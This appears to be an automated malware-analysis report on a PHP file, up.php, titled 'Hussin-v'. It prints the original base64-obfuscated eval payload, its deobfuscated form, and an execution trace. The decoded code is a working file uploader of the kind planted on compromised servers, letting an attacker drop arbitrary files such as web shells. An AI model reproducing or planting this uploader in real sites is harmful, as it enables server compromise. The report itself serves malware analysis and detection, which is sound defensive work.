PHP Malware Analysis
up.php
md5: 637711b108d590aeef311fafbbaeff6d
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Execution
- eval (Original)
Files
- copy (Deobfuscated)
Input
- _FILES (Deobfuscated)
- _POST (Deobfuscated)
Title
- Hussin-v (Deobfuscated)
Deobfuscated PHP code
<?php
eval /* PHPDeobfuscator eval output */ {
echo "<title>Hussin-v </title>";
echo "<form action=\"\" method=\"post\" enctype=\"multipart/form-data\" name=\"uploader\n\" id=\"uploader\">";
echo "<input type=\"file\" name=\"file\" size=\"50\"><input name=\"_upl\" type=\"submit\"\nid=\"_upl\" value=\"Upload\"></form>";
if ($_POST['_upl'] == "Upload") {
if (@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {
echo "\n<b>Upload Complate !!!</b><br><br>";
} else {
echo "<b>Upload Failed !!!</b><br><br>";
}
}
};Execution traces
data/traces/637711b108d590aeef311fafbbaeff6d_trace-1676254334.0069.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 00:12:39.904680]
1 0 1 0.000138 393464
1 3 0 0.000180 393752 {main} 1 /var/www/html/uploads/up.php 0 0
1 3 1 0.000198 393752
0.000223 314200
TRACE END [2023-02-13 00:12:39.904793]
Generated HTML code
<html><head></head><body></body></html>Original PHP code
<?
Eval(BaSe64_Decode('ZWNobyAnPHRpdGxlPkh1c3Npbi12IDwvdGl0bGU+JzsKZWNobyAnPGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0icG9zdCIgZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSIgbmFtZT0idXBsb2FkZXIKIiBpZD0idXBsb2FkZXIiPic7CmVjaG8gJzxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmaWxlIiBzaXplPSI1MCI+PGlucHV0IG5hbWU9Il91cGwiIHR5cGU9InN1Ym1pdCIKaWQ9Il91cGwiIHZhbHVlPSJVcGxvYWQiPjwvZm9ybT4nOwppZiggJF9QT1NUWydfdXBsJ10gPT0gIlVwbG9hZCIgKSB7CiAgICAgICAgaWYoQGNvcHkoJF9GSUxFU1snZmlsZSddWyd0bXBfbmFtZSddLCAkX0ZJTEVTWydmaWxlJ11bJ25hbWUnXSkpIHsgZWNobyAnCjxiPlVwbG9hZCBDb21wbGF0ZSAhISE8L2I+PGJyPjxicj4nOyB9CiAgICAgICAgZWxzZSB7IGVjaG8gJzxiPlVwbG9hZCBGYWlsZWQgISEhPC9iPjxicj48YnI+JzsgfQp9'));
?>